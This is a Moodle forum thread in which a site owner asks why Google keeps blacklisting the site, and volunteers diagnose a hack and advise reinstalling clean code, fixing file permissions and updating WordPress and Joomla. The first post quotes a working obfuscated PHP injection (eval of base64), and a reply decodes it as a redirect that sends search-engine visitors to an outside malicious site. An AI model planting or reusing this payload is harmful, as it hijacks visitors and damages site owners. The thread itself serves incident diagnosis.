My site is listed as suspicious site !! help mee

My site is listed as suspicious site !! help mee

by eda karacelebi -
Number of replies: 6

Hello everyone,

On my moodle web site, this is the third time, google list my site as blacklisted. And again this is the third time, when I analyze my site, I discovered taht in my .php files, there is a code: "  eval(base64_decode("DQoNCg0KZXJyb3JfcmVwb3J0aW5nKDApOw0KJG5jY3Y9aGVhZGVyc19zZW50KCk7DQppZiAoISRuY2N2KXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YT0kX1NFUlZFUlsnSFRUUF9VU0VSX0FHRU5UJ107DQppZiAoc3RyaXN0cigkcmVmZXJlciwidHdpdHRlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29vZ2xlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImFzay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJtc24iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2siKSkgew0KCWlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CQkNCgkJaGVhZGVyKCJMb2NhdGlvbjogaHR0cDovL3Jpbmdvc3RhcnQub3NhLnBsLyIpOw0KCQlleGl0KCk7DQoJfQ0KfQ0KfQ=="));"

When I delete these  code, the problem dissapear. But for instance today, I am doing this job for 6 hours! this is a very crazy work! I want to stop this error. Do you have any idea? In my site there is also Joomla and Wordpress installed. All these applications are open source systems. So is it the reason for this?

Average of ratings: -
In reply to eda karacelebi

Re: My site is listed as suspicious site !! help mee

by Howard Miller -
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers
Unfortunately, you have been hacked...

Read: http://docs.moodle.org/20/en/Hacked_site_recovery

Then do what this says: http://docs.moodle.org/20/en/Security

Essentially, the permissions on your moodle files are too lax. They are writeable by the web server user which is a bad thing. You should really just replace the code with a newly downloaded version. It's the only safe way (and fix the permissions).
Average of ratings: Useful (2)
In reply to eda karacelebi

Re: My site is listed as suspicious site !! help mee

by Alex Walker -

Howard's totally right. I've run the string you posted through a base64 decoder, and it comes out as this:

error_reporting(0);
$nccv=headers_sent();
if (!$nccv){
$referer=$_SERVER['HTTP_REFERER'];
$ua=$_SERVER['HTTP_USER_AGENT'];
if (stristr($referer,"twitter") or stristr($referer,"yahoo")
or stristr($referer,"google") or stristr($referer,"bing")
or stristr($referer,"ask.com") or stristr($referer,"msn") or stristr($referer,"live")
or stristr($referer,"facebook")) {
	if (!stristr($referer,"cache") or !stristr($referer,"inurl")){		
		header("Location: http://****removed****.pl/");
		exit();
	}
}
}

This is classic search engine hijacking. It's designed to detect search engines (such as Google, Bing, Yahoo) and re-redirect them to that malicious Polish site.

Check your permissions, as Howard says. Also, make sure all your web applications on this server are up to date. Don't assume this is just a Moodle problem, especially since you're running Joomla and WordPress on the same server. Since these two web applications are so popular, they're very easily hacked and exploited if you don't keep them up to date.

Average of ratings: -
In reply to Alex Walker

Ynt: Re: My site is listed as suspicious site !! help mee

by eda karacelebi -

thank you so much for both you. I am not knowledgeable about the codes. I am new to moodle and open sources systems. I just opened my .php files and deleted this code. Then I changed my FTP password and moodle, wordpress and joomla password. My hosting service is Godaddy and in Godaddy's update page, I can authomatically update the applications but I am anxious about if I update my system, they will still work?? For instance my moodle version is 1.9.9 and if I update it, it will be 1.9.10. Will I loose data? Because nearly 2000 students are still doing homework through the moodle. What do you advice me? When we do update, will I loose data?

And secondly, when you say "check your permission", is it about the roles in moodle? Just I am the admin and students have students role, which is very limited.

I am sorry if I ask odd questions but as I said, I am not professional and I am waiting for your answer hopefully.

thanks

Average of ratings: -
In reply to eda karacelebi

Re: Ynt: Re: My site is listed as suspicious site !! help mee

by Howard Miller -
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers
Did you read the links I sent you. There are some important points...

1. Do NOT just delete the codes. Remove ALL the Moodle code and replace with newly downloaded code (from this site). You are not touching your database or your moodledata folders so you are safe. Just keep the config.php file for re-use to make sure it is clean.

2. To run a public website you HAVE to understand server file permissions. This is nothing whatever to do with Moodle, it is what happens when you do not lock down web programs properly. As I don't know anything about GoDaddy, I would recommend that you ask their support people what the best settings are. I'm sure this is a common question smile
Average of ratings: -
In reply to Howard Miller

Ynt: Re: Ynt: Re: My site is listed as suspicious site !! help mee

by eda karacelebi -

thank you Horward; I have 3 more moodle tht I use or testin something. I mean no one use the moodles. I tried to do update by using the panel in Godaddy but during two days I couldn`t open the moodles.. So I am still afraid of doing update to my active moodle because I have over 1500 active users. In your post, you wrote about replacing the codes with the new code. Can you please give me the link to download the code?

For the server permission, I send e-mail to godaddy and wrote about Firewall settings as you send me in the links. I am waiting for the reply. I will inform you about the reply.

And lastly, there are the links with problems on my site. They are like m

/groups/george+w+bush  

/groups/monday+night+football

/index.php?option=com_content&view=article&id=63&Itemid=84

But my moodle is installed in www.terakki.net/tmoodle directory. So isn`t there a problem on my moodle?

Average of ratings: -
In reply to eda karacelebi

Re: Ynt: Re: Ynt: Re: My site is listed as suspicious site !! help mee

by Iñaki Arenaza -
Picture of Core developers Picture of Documentation writers Picture of Particularly helpful Moodlers Picture of Peer reviewers Picture of Plugin developers
The last link you show is a joomla link (and the two other could be either Wordpress or Joomla links, as Moodle doesn't have a '/groups' subdirectory).

I know for a fact that Wordpress has lots of security issues and you have to keep it up-to-date, regularly installing the latest versions (they don't fix the security problems in previous versions, they tell you to upgrade to the latest version). And many of them have been serious security issues that could be used to infect other software installed in your web site (like Joomla and Moodle in your case).

Joomla is less problematic than Wordpress, but it's had its share of security problems aswell (just like Moodle, no softaware is perfect).

So you should also check your Wordpress and Joomla installas (the core program, and any additional plugins or themes you have installed).

Saludos.
Iñaki
Average of ratings: -